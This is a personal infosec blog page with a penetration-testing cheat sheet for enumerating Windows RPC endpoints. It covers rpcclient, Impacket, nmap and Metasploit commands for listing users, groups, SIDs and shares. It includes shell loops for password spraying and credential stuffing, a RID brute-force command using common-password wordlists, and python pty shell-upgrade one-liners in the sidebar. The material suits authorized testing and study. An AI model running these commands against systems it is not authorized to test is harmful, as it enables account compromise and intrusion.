akde/infosec

Information security is ultimately about managing risk

RPC Remote Procedure Call

, , ,

tcp/135 udp/135 — and as (Microsoft) Remote Pro­ce­dure Call on tcp/593 as web service.

Enumeration

Obtain gen­er­al information

# rpcinfo -p $target
# rpcinfo -s $target

Con­nect. Hint: auto com­ple­tion works; enum<tab> returns all enum commands.

rpcclient -U "" $target

Enu­mer­ate through all API end­points with one of the fol­low­ing options.

python /usr/local/bin/rpcdump.py $target | tee rpcdump.txt
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
nmap -n -sV -p 135 --script=msrpc-enum $target
getArch.py -target $target

Check if RPC ports allow­ing anony­mous access

msf > use auxiliary/scanner/dcerpc/hidden
msf > use auxiliary/scanner/dcerpc/management
msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

See here for a list what the UUIDs mean.

Con­nect direct­ly to an end­point via

rpcclient ncacn_ip_tcp:$target[49672]

But in gen­er­al, you can use rpc­client (see below) to access all end­points in a shell.

Enumerate with rpc

All users with their password

for up in $(cat users_and_passwords.txt); do
  username=$(echo $up | cut -d ':' -f 1)
  password=$(echo $up | cut -d ':' -f 2)
  echo "$username / $password"
  rpcclient -U svcorp\\$username%$password $target
done;

All users with all passwords

for user in $(cat users.txt); do
  for p in $(cat test_passwords.txt); do
    echo "$user / $p"
    rpcclient -U svcorp\\$user%$p $target;
  done;
done;

Enumeration with Impacket tools

See the Impack­et post

Accessing RCP endpoints with rpcclient

  • RID Role Identifier
  • SID Secu­ri­ty Identifier

First, enter

help

to see a descrip­tion of avail­able end­points on this system.

Endpoint SAM Remote Protocol

Try Impack­et’s samrdump.py.

Enu­mer­ate local users: Does­n’t seem to be avail­able. But you can use RID_ENUM.

python3 /opt/ridenum/ridenum.py $target 500 50000 /usr/share/wordlists/seclists/Passwords/Common-Credentials/best110.txt /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt

Enu­mer­ate domain users:

enumdomusers

Enu­mer­ate domain groups:

enumdomgroups

Details about an user.

queryuser <rid>

Details about a group

querygroup <rid>

Mem­bers of a group

querygroupmem <rid>

Other endpoints

enumprivs

Sys­tem info

srvinfo

Domain name and domain sid (secu­ri­ty identifier)

lsaquery
dsenumdomtrusts

Detect net­work shares

netshareenum

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';